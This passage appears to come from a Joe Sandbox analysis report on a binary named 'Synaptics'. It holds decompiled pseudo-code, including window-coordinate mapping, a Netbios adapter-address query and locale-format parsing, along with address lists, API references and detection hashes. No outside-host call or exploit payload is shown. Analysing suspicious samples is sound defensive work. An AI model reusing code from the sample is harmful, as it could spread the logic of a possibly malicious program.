							E0045B1B0( *_t250, 0, _t231);
						}
						L26:
						_pop(_t271);
						 *[fs:eax] = _t271;
						_push(0x45b9cd);
						E004049E4( &_v148, 2);
						_t273 =  *0x451298; // 0x45129c
						return E0040547C( &_v100, _t273);
					}
				}
			}












































                                                                                                                                                                                          0x0045b641
                                                                                                                                                                                          0x0045b649
                                                                                                                                                                                          0x0045b64a
                                                                                                                                                                                          0x0045b64e
                                                                                                                                                                                          0x0045b654
                                                                                                                                                                                          0x0045b65f
                                                                                                                                                                                          0x0045b660
                                                                                                                                                                                          0x0045b661
                                                                                                                                                                                          0x0045b667
                                                                                                                                                                                          0x0045b66d
                                                                                                                                                                                          0x0045b672
                                                                                                                                                                                          0x0045b677
                                                                                                                                                                                          0x0045b678
                                                                                                                                                                                          0x0045b67d
                                                                                                                                                                                          0x0045b680
                                                                                                                                                                                          0x0045b685
                                                                                                                                                                                          0x0045b692
                                                                                                                                                                                          0x0045b97f
                                                                                                                                                                                          0x0045b97f
                                                                                                                                                                                          0x0045b982
                                                                                                                                                                                          0x0045b984
                                                                                                                                                                                          0x0045b995
                                                                                                                                                                                          0x0045b986
                                                                                                                                                                                          0x0045b98c
                                                                                                                                                                                          0x0045b98c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045b6cb
                                                                                                                                                                                          0x0045b6d0
                                                                                                                                                                                          0x0045b6d6
                                                                                                                                                                                          0x0045b6dc
                                                                                                                                                                                          0x0045b6e4
                                                                                                                                                                                          0x0045b6f1
                                                                                                                                                                                          0x0045b6f9
                                                                                                                                                                                          0x0045b704
                                                                                                                                                                                          0x0045b70f
                                                                                                                                                                                          0x0045b710
                                                                                                                                                                                          0x0045b711
                                                                                                                                                                                          0x0045b712
                                                                                                                                                                                          0x0045b71d
                                                                                                                                                                                          0x0045b722
                                                                                                                                                                                          0x0045b727
                                                                                                                                                                                          0x0045b72f
                                                                                                                                                                                          0x0045b732
                                                                                                                                                                                          0x0045b734
                                                                                                                                                                                          0x0045b744
                                                                                                                                                                                          0x0045b749
                                                                                                                                                                                          0x0045b74f
                                                                                                                                                                                          0x0045b754
                                                                                                                                                                                          0x0045b756
                                                                                                                                                                                          0x0045b758
                                                                                                                                                                                          0x0045b75f
                                                                                                                                                                                          0x0045b76c
                                                                                                                                                                                          0x0045b76c
                                                                                                                                                                                          0x0045b75f
                                                                                                                                                                                          0x0045b736
                                                                                                                                                                                          0x0045b73d
                                                                                                                                                                                          0x0045b73d
                                                                                                                                                                                          0x0045b783
                                                                                                                                                                                          0x0045b796
                                                                                                                                                                                          0x0045b7a1
                                                                                                                                                                                          0x0045b7aa
                                                                                                                                                                                          0x0045b7b8
                                                                                                                                                                                          0x0045b7c9
                                                                                                                                                                                          0x0045b7d7
                                                                                                                                                                                          0x0045b7de
                                                                                                                                                                                          0x0045b7e6
                                                                                                                                                                                          0x0045b7e9
                                                                                                                                                                                          0x0045b7ee
                                                                                                                                                                                          0x0045b7f3
                                                                                                                                                                                          0x0045b80d
                                                                                                                                                                                          0x0045b815
                                                                                                                                                                                          0x0045b835
                                                                                                                                                                                          0x0045b835
                                                                                                                                                                                          0x0045b83f
                                                                                                                                                                                          0x0045b849
                                                                                                                                                                                          0x0045b84d
                                                                                                                                                                                          0x0045b84d
                                                                                                                                                                                          0x0045b84d
                                                                                                                                                                                          0x0045b84f
                                                                                                                                                                                          0x0045b851
                                                                                                                                                                                          0x0045b85a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045b860
                                                                                                                                                                                          0x0045b860
                                                                                                                                                                                          0x0045b864
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045b86e
                                                                                                                                                                                          0x0045b886
                                                                                                                                                                                          0x0045b8a1
                                                                                                                                                                                          0x0045b8b3
                                                                                                                                                                                          0x0045b8cb
                                                                                                                                                                                          0x0045b8d7
                                                                                                                                                                                          0x0045b8da
                                                                                                                                                                                          0x0045b8dd
                                                                                                                                                                                          0x0045b8dd
                                                                                                                                                                                          0x0045b8ee
                                                                                                                                                                                          0x0045b8f3
                                                                                                                                                                                          0x0045b8fb
                                                                                                                                                                                          0x0045b904
                                                                                                                                                                                          0x0045b915
                                                                                                                                                                                          0x0045b91a
                                                                                                                                                                                          0x0045b922
                                                                                                                                                                                          0x0045b92b
                                                                                                                                                                                          0x0045b939
                                                                                                                                                                                          0x0045b952
                                                                                                                                                                                          0x0045b958
                                                                                                                                                                                          0x0045b95d
                                                                                                                                                                                          0x0045b962
                                                                                                                                                                                          0x0045b978
                                                                                                                                                                                          0x0045b964
                                                                                                                                                                                          0x0045b96a
                                                                                                                                                                                          0x0045b96a
                                                                                                                                                                                          0x0045b99a
                                                                                                                                                                                          0x0045b99c
                                                                                                                                                                                          0x0045b99f
                                                                                                                                                                                          0x0045b9a2
                                                                                                                                                                                          0x0045b9b2
                                                                                                                                                                                          0x0045b9ba
                                                                                                                                                                                          0x0045b9c5
                                                                                                                                                                                          0x0045b9c5
                                                                                                                                                                                          0x0045b85a

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004517CC: GetActiveWindow.USER32 ref: 004517CF
                                                                                                                                                                                            • Part of subcall function 004517CC: GetCurrentThreadId.KERNEL32 ref: 004517E4
                                                                                                                                                                                            • Part of subcall function 004517CC: 73CCAC10.USER32(00000000,004517AC), ref: 004517EA
                                                                                                                                                                                            • Part of subcall function 0045B3E0: GetCursor.USER32(?), ref: 0045B3FB
                                                                                                                                                                                            • Part of subcall function 0045B3E0: GetIconInfo.USER32(00000000,?), ref: 0045B401
                                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 0045B76C
                                                                                                                                                                                          • OffsetRect.USER32(?,?,?), ref: 0045B783
                                                                                                                                                                                          • OffsetRect.USER32(?,?,?), ref: 0045B8B3
                                                                                                                                                                                            • Part of subcall function 0045B1B0: SetTimer.USER32(00000000,00000000,?,00458E50), ref: 0045B1CA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: OffsetRect$ActiveClientCurrentCursorIconInfoScreenThreadTimerWindow
                                                                                                                                                                                          • String ID: tC
                                                                                                                                                                                          • API String ID: 3022406661-1085749316
                                                                                                                                                                                          • Opcode ID: 8d75810e1bb389575f144e91ffdcde4a32279e696f214dc73965cba5fb822eb8
                                                                                                                                                                                          • Instruction ID: 5094cc74829a0d0ddc56b95c8e280c0bc637037c8d8d66aa697b62fbdea552c2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d75810e1bb389575f144e91ffdcde4a32279e696f214dc73965cba5fb822eb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FC1D675A006188FCB10EF68C485A9EB7F5FF49304F1440AAE905EB366DB34AD49CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043BC7C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                          			E0043BC7C(void* __eax, intOrPtr __ecx, intOrPtr __edx, char _a4) {
				intOrPtr _v8;
				char _v9;
				intOrPtr _v16;
				struct tagPOINT _v32;
				intOrPtr _v36;
				long _v40;
				char _v56;
				void* __edi;
				struct HWND__* _t57;
				void* _t63;
				char _t84;
				struct HWND__* _t108;
				void* _t110;
				intOrPtr _t134;
				intOrPtr _t137;
				void* _t141;
				struct HWND__* _t143;
				struct HWND__* _t147;
				void* _t152;
				void* _t154;
				intOrPtr _t155;

				_t152 = _t154;
				_t155 = _t154 + 0xffffffcc;
				_v8 = __ecx;
				_t137 = __edx;
				_t110 = __eax;
				if(__edx == 0 || __edx == 0xffffffff) {
					_t57 =  *(_t110 + 0xa0);
					if(_t57 == 0 ||  *((char*)(_t57 + 0x1a7)) == 0 ||  *((intOrPtr*)(_t57 + 0x17c)) == 0) {
						E004197DC( *((intOrPtr*)(_t110 + 0x40)),  &_v40,  *((intOrPtr*)(_t110 + 0x44)));
						_v32.x = _v40;
						_v32.y = _v36;
						_t143 =  *(_t110 + 0x30);
						__eflags = _t143;
						if(_t143 != 0) {
							E0043AA94(_t143,  &_v40,  &_v32);
							_v32.x = _v40;
							_v32.y = _v36;
						}
					} else {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x17c)))) + 0x14))();
						MapWindowPoints(E00441704( *(_t110 + 0xa0)), 0,  &_v32, 2);
					}
					_t63 = E0043AF0C(_t110);
					E0041982C(_v32.x, E0043AF20(_t110), _v32.y,  &_v56, _t63);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v9 = E0043BE5C(_t110,  &_v32);
					goto L20;
				} else {
					E0043C164(__eax);
					__eflags =  *(_t110 + 0xa0);
					if(__eflags == 0) {
						L12:
						_t84 = 1;
					} else {
						_t108 = E00403DE8( *(_t110 + 0xa0), __eflags);
						__eflags = _t108;
						if(_t108 != 0) {
							goto L12;
						} else {
							_t84 = 0;
						}
					}
					_v9 = _t84;
					__eflags = _v9;
					if(_v9 == 0) {
						L20:
						return _v9;
					} else {
						_v16 = E00438690(1, _t137);
						_push(_t152);
						_push(0x43be47);
						_push( *[fs:edx]);
						 *[fs:edx] = _t155;
						_t87 =  *(_t110 + 0xa0);
						__eflags =  *(_t110 + 0xa0);
						if( *(_t110 + 0xa0) == 0) {
							_t147 = 0;
							__eflags = 0;
						} else {
							_t147 = E00441704(_t87);
						}
						E0043A91C(_t110,  &_v32);
						__eflags = _t147;
						if(__eflags != 0) {
							MapWindowPoints(_t147, 0,  &_v32, 2);
						}
						 *((intOrPtr*)(_v16 + 4)) = _t137;
						 *((char*)(_v16 + 0x54)) = _a4;
						 *((intOrPtr*)(_v16 + 0x58)) = _v8;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t141 = _t137;
						MapWindowPoints(0, E00441704(_t141),  &_v32, 1);
						_push(_v32.y);
						E00403DE8(_t141, __eflags);
						__eflags = 0;
						_pop(_t134);
						 *[fs:eax] = _t134;
						_push(0x43be4e);
						return E00403BEC(_v16);
					}
				}
			}
























                                                                                                                                                                                          0x0043bc7d
                                                                                                                                                                                          0x0043bc7f
                                                                                                                                                                                          0x0043bc85
                                                                                                                                                                                          0x0043bc88
                                                                                                                                                                                          0x0043bc8a
                                                                                                                                                                                          0x0043bc8e
                                                                                                                                                                                          0x0043bc99
                                                                                                                                                                                          0x0043bca1
                                                                                                                                                                                          0x0043bce9
                                                                                                                                                                                          0x0043bcf1
                                                                                                                                                                                          0x0043bcf7
                                                                                                                                                                                          0x0043bcfa
                                                                                                                                                                                          0x0043bcfd
                                                                                                                                                                                          0x0043bcff
                                                                                                                                                                                          0x0043bd09
                                                                                                                                                                                          0x0043bd11
                                                                                                                                                                                          0x0043bd17
                                                                                                                                                                                          0x0043bd17
                                                                                                                                                                                          0x0043bcb5
                                                                                                                                                                                          0x0043bcc2
                                                                                                                                                                                          0x0043bcd9
                                                                                                                                                                                          0x0043bcd9
                                                                                                                                                                                          0x0043bd1c
                                                                                                                                                                                          0x0043bd35
                                                                                                                                                                                          0x0043bd40
                                                                                                                                                                                          0x0043bd41
                                                                                                                                                                                          0x0043bd42
                                                                                                                                                                                          0x0043bd43
                                                                                                                                                                                          0x0043bd4e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043bd56
                                                                                                                                                                                          0x0043bd58
                                                                                                                                                                                          0x0043bd5d
                                                                                                                                                                                          0x0043bd64
                                                                                                                                                                                          0x0043bd81
                                                                                                                                                                                          0x0043bd81
                                                                                                                                                                                          0x0043bd66
                                                                                                                                                                                          0x0043bd74
                                                                                                                                                                                          0x0043bd79
                                                                                                                                                                                          0x0043bd7b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043bd7d
                                                                                                                                                                                          0x0043bd7d
                                                                                                                                                                                          0x0043bd7d
                                                                                                                                                                                          0x0043bd7b
                                                                                                                                                                                          0x0043bd83
                                                                                                                                                                                          0x0043bd86
                                                                                                                                                                                          0x0043bd8a
                                                                                                                                                                                          0x0043be4e
                                                                                                                                                                                          0x0043be57
                                                                                                                                                                                          0x0043bd90
                                                                                                                                                                                          0x0043bd9e
                                                                                                                                                                                          0x0043bda3
                                                                                                                                                                                          0x0043bda4
                                                                                                                                                                                          0x0043bda9
                                                                                                                                                                                          0x0043bdac
                                                                                                                                                                                          0x0043bdaf
                                                                                                                                                                                          0x0043bdb5
                                                                                                                                                                                          0x0043bdb7
                                                                                                                                                                                          0x0043bdc2
                                                                                                                                                                                          0x0043bdc2
                                                                                                                                                                                          0x0043bdb9
                                                                                                                                                                                          0x0043bdbe
                                                                                                                                                                                          0x0043bdbe
                                                                                                                                                                                          0x0043bdc9
                                                                                                                                                                                          0x0043bdce
                                                                                                                                                                                          0x0043bdd0
                                                                                                                                                                                          0x0043bddb
                                                                                                                                                                                          0x0043bddb
                                                                                                                                                                                          0x0043bde3
                                                                                                                                                                                          0x0043bdec
                                                                                                                                                                                          0x0043bdf5
                                                                                                                                                                                          0x0043be02
                                                                                                                                                                                          0x0043be03
                                                                                                                                                                                          0x0043be04
                                                                                                                                                                                          0x0043be05
                                                                                                                                                                                          0x0043be06
                                                                                                                                                                                          0x0043be17
                                                                                                                                                                                          0x0043be1f
                                                                                                                                                                                          0x0043be2c
                                                                                                                                                                                          0x0043be31
                                                                                                                                                                                          0x0043be33
                                                                                                                                                                                          0x0043be36
                                                                                                                                                                                          0x0043be39
                                                                                                                                                                                          0x0043be46
                                                                                                                                                                                          0x0043be46
                                                                                                                                                                                          0x0043bd8a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PointsWindow
                                                                                                                                                                                          • String ID: `C
                                                                                                                                                                                          • API String ID: 4123100037-1847193361
                                                                                                                                                                                          • Opcode ID: edafbefe9214ada682fb394692102233c218be9ebcf8d20e0dd442c83bccb53c
                                                                                                                                                                                          • Instruction ID: c5412465f47d1a6e8130c1b59b62e835d5ea1c6a9e2590bbc59edeaf8022136c
                                                                                                                                                                                          • Opcode Fuzzy Hash: edafbefe9214ada682fb394692102233c218be9ebcf8d20e0dd442c83bccb53c
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0514D75E002089FCB11DFA9C882BEEB7B5EF49304F14906AED14AB392C7799D05CB95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00475658 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                                          			E00475658(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed char* _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _t79;
				char* _t115;
				void* _t116;
				intOrPtr _t145;
				void* _t152;
				intOrPtr _t155;
				intOrPtr _t156;
				void* _t162;

				_t155 = _t156;
				_t116 = 5;
				do {
					_push(0);
					_push(0);
					_t116 = _t116 - 1;
				} while (_t116 != 0);
				_v8 = __eax;
				_push(_t155);
				_push(0x475868);
				_push( *[fs:eax]);
				 *[fs:eax] = _t156;
				E004049C0(_v8);
				E004049C0( &_v20);
				_t115 = E0040275C(0x40);
				E004032B4(_t115, 0x40);
				_v16 = E0040275C(0x100);
				E004032B4(_v16, 0x100);
				_t152 = E0040275C(0x3c);
				E004032B4(_t152, 0x3c);
				 *_v16 = 0;
				 *_t115 = 0x37;
				 *((intOrPtr*)(_t115 + 4)) = _v16;
				 *((short*)(_t115 + 8)) = 4;
				_push(_t115);
				L00472C18();
				_v12 = 0;
				while(1) {
					E004032B4(_t115, 0x40);
					 *_t115 = 0x32;
					 *((char*)(_t115 + 0x30)) = _v16[_v12 + 1];
					_push(_t115);
					L00472C18();
					E004032B4(_t115, 0x40);
					 *_t115 = 0x33;
					_t79 = _v16[_v12 + 1];
					 *((char*)(_t115 + 0x30)) = _t79;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t152 = _t152;
					 *((intOrPtr*)(_t115 + 4)) = 0x475878;
					 *((short*)(_t115 + 8)) = 0x3c;
					_push(_t115);
					L00472C18();
					if(_t79 == 0 || _t79 == 6) {
						E00409600( &_v24, 2);
						_push(_v24);
						_push(0x475890);
						E00409600( &_v28, 2);
						_push(_v28);
						_push(0x475890);
						E00409600( &_v32, 2);
						_push(_v32);
						_push(0x475890);
						E00409600( &_v36, 2);
						_push(_v36);
						_push(0x475890);
						E00409600( &_v40, 2);
						_push(_v40);
						_push(0x475890);
						E00409600( &_v44, 2);
						_push(_v44);
						E00404D40();
					}
					_v12 = _v12 + 1;
					_t162 = ( *_v16 & 0x000000ff) - _v12;
					if(_t162 <= 0) {
						break;
					}
					E00404DCC(_v20, "00-00-00-00-00-00");
					if(_t162 == 0) {
						continue;
					}
					break;
				}
				E0040277C(_t115);
				E0040277C(_t152);
				E0040277C(_v16);
				E00404A14(_v8, _v20);
				_pop(_t145);
				 *[fs:eax] = _t145;
				_push(E0047586F);
				return E004049E4( &_v44, 7);
			}





















                                                                                                                                                                                          0x00475659
                                                                                                                                                                                          0x0047565b
                                                                                                                                                                                          0x00475660
                                                                                                                                                                                          0x00475660
                                                                                                                                                                                          0x00475662
                                                                                                                                                                                          0x00475664
                                                                                                                                                                                          0x00475664
                                                                                                                                                                                          0x0047566a
                                                                                                                                                                                          0x0047566f
                                                                                                                                                                                          0x00475670
                                                                                                                                                                                          0x00475675
                                                                                                                                                                                          0x00475678
                                                                                                                                                                                          0x0047567e
                                                                                                                                                                                          0x00475686
                                                                                                                                                                                          0x00475695
                                                                                                                                                                                          0x004756a0
                                                                                                                                                                                          0x004756af
                                                                                                                                                                                          0x004756bc
                                                                                                                                                                                          0x004756cb
                                                                                                                                                                                          0x004756d6
                                                                                                                                                                                          0x004756de
                                                                                                                                                                                          0x004756e1
                                                                                                                                                                                          0x004756e7
                                                                                                                                                                                          0x004756ea
                                                                                                                                                                                          0x004756f0
                                                                                                                                                                                          0x004756f1
                                                                                                                                                                                          0x004756f8
                                                                                                                                                                                          0x004756fb
                                                                                                                                                                                          0x00475706
                                                                                                                                                                                          0x0047570b
                                                                                                                                                                                          0x00475718
                                                                                                                                                                                          0x0047571b
                                                                                                                                                                                          0x0047571c
                                                                                                                                                                                          0x0047572a
                                                                                                                                                                                          0x0047572f
                                                                                                                                                                                          0x00475738
                                                                                                                                                                                          0x0047573c
                                                                                                                                                                                          0x00475748
                                                                                                                                                                                          0x00475749
                                                                                                                                                                                          0x0047574a
                                                                                                                                                                                          0x0047574b
                                                                                                                                                                                          0x0047574c
                                                                                                                                                                                          0x0047574d
                                                                                                                                                                                          0x00475750
                                                                                                                                                                                          0x00475756
                                                                                                                                                                                          0x00475757
                                                                                                                                                                                          0x0047575e
                                                                                                                                                                                          0x00475774
                                                                                                                                                                                          0x00475779
                                                                                                                                                                                          0x0047577c
                                                                                                                                                                                          0x0047578e
                                                                                                                                                                                          0x00475793
                                                                                                                                                                                          0x00475796
                                                                                                                                                                                          0x004757a8
                                                                                                                                                                                          0x004757ad
                                                                                                                                                                                          0x004757b0
                                                                                                                                                                                          0x004757c2
                                                                                                                                                                                          0x004757c7
                                                                                                                                                                                          0x004757ca
                                                                                                                                                                                          0x004757dc
                                                                                                                                                                                          0x004757e1
                                                                                                                                                                                          0x004757e4
                                                                                                                                                                                          0x004757f6
                                                                                                                                                                                          0x004757fb
                                                                                                                                                                                          0x00475806
                                                                                                                                                                                          0x00475806
                                                                                                                                                                                          0x0047580b
                                                                                                                                                                                          0x00475814
                                                                                                                                                                                          0x00475817
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00475821
                                                                                                                                                                                          0x00475826
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00475826
                                                                                                                                                                                          0x0047582e
                                                                                                                                                                                          0x00475835
                                                                                                                                                                                          0x0047583d
                                                                                                                                                                                          0x00475848
                                                                                                                                                                                          0x0047584f
                                                                                                                                                                                          0x00475852
                                                                                                                                                                                          0x00475855
                                                                                                                                                                                          0x00475867

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Netbios.NETAPI32(00000000), ref: 004756F1
                                                                                                                                                                                          • Netbios.NETAPI32(00000000), ref: 0047571C
                                                                                                                                                                                          • Netbios.NETAPI32(00000000), ref: 00475757
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Netbios
                                                                                                                                                                                          • String ID: 00-00-00-00-00-00
                                                                                                                                                                                          • API String ID: 544444789-1648688922
                                                                                                                                                                                          • Opcode ID: 4646a4b3de395208eda0c5ad61981e471ec873520f01a6b82e0f0c747f644e75
                                                                                                                                                                                          • Instruction ID: dc29ca18e00d15a9725c9b3c649b13ae9c6c43c4cf661d243729a07c7496b8e6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4646a4b3de395208eda0c5ad61981e471ec873520f01a6b82e0f0c747f644e75
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A5183346045449BDB01EFA9C882BDEBBF5AF4C304F5584BEE458BB383C6789901CB69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040CC9C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                          			E0040CC9C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40ce66);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E004049C0(__edx);
				E0040C964(GetThreadLocale(), 0x40ce7c, 0x1009,  &_v12);
				if(E00409664(0x40ce7c, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404C80(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x49b134], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40ce80);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E0040A0C8(_t124 + _t92 - 1, 4, 0x40ce90);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40cea8);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404C88(_t122, 0x40cec0);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404BA8();
												E00404C88(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404C88(_t122, 0x40ceb4);
										_t92 = _t92 + 1;
									}
								} else {
									E00404C88(_t122, 0x40cea0);
									_t92 = _t92 + 3;
								}
							} else {
								E00404C88(_t122, 0x40ce8c);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040DD78(_t124, _t92);
							E00404EE0(_t124, _v8, _t92,  &_v20);
							E00404C88(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x49e748; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00404A14(_t122, _t124);
					} else {
						while(_t92 <= E00404C80(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404BA8();
									E00404C88(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040CE6D);
				return E004049E4( &_v24, 4);
			}























                                                                                                                                                                                          0x0040cc9c
                                                                                                                                                                                          0x0040cca1
                                                                                                                                                                                          0x0040cca2
                                                                                                                                                                                          0x0040cca3
                                                                                                                                                                                          0x0040cca4
                                                                                                                                                                                          0x0040cca5
                                                                                                                                                                                          0x0040cca9
                                                                                                                                                                                          0x0040ccab
                                                                                                                                                                                          0x0040ccaf
                                                                                                                                                                                          0x0040ccb0
                                                                                                                                                                                          0x0040ccb5
                                                                                                                                                                                          0x0040ccb8
                                                                                                                                                                                          0x0040ccbb
                                                                                                                                                                                          0x0040ccc2
                                                                                                                                                                                          0x0040ccda
                                                                                                                                                                                          0x0040ccf2
                                                                                                                                                                                          0x0040ce3c
                                                                                                                                                                                          0x0040ce3e
                                                                                                                                                                                          0x0040ce43
                                                                                                                                                                                          0x0040ce45
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040cd5b
                                                                                                                                                                                          0x0040cd60
                                                                                                                                                                                          0x0040cd67
                                                                                                                                                                                          0x0040cda5
                                                                                                                                                                                          0x0040cdaa
                                                                                                                                                                                          0x0040cdac
                                                                                                                                                                                          0x0040cdcb
                                                                                                                                                                                          0x0040cdd0
                                                                                                                                                                                          0x0040cdd2
                                                                                                                                                                                          0x0040cdf3
                                                                                                                                                                                          0x0040cdf8
                                                                                                                                                                                          0x0040cdfa
                                                                                                                                                                                          0x0040ce0f
                                                                                                                                                                                          0x0040ce0f
                                                                                                                                                                                          0x0040ce11
                                                                                                                                                                                          0x0040ce17
                                                                                                                                                                                          0x0040ce1e
                                                                                                                                                                                          0x0040ce13
                                                                                                                                                                                          0x0040ce13
                                                                                                                                                                                          0x0040ce15
                                                                                                                                                                                          0x0040ce2c
                                                                                                                                                                                          0x0040ce36
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040ce15
                                                                                                                                                                                          0x0040cdfc
                                                                                                                                                                                          0x0040ce03
                                                                                                                                                                                          0x0040ce08
                                                                                                                                                                                          0x0040ce08
                                                                                                                                                                                          0x0040cdd4
                                                                                                                                                                                          0x0040cddb
                                                                                                                                                                                          0x0040cde0
                                                                                                                                                                                          0x0040cde0
                                                                                                                                                                                          0x0040cdae
                                                                                                                                                                                          0x0040cdb5
                                                                                                                                                                                          0x0040cdba
                                                                                                                                                                                          0x0040cdba
                                                                                                                                                                                          0x0040ce3b
                                                                                                                                                                                          0x0040ce3b
                                                                                                                                                                                          0x0040cd69
                                                                                                                                                                                          0x0040cd72
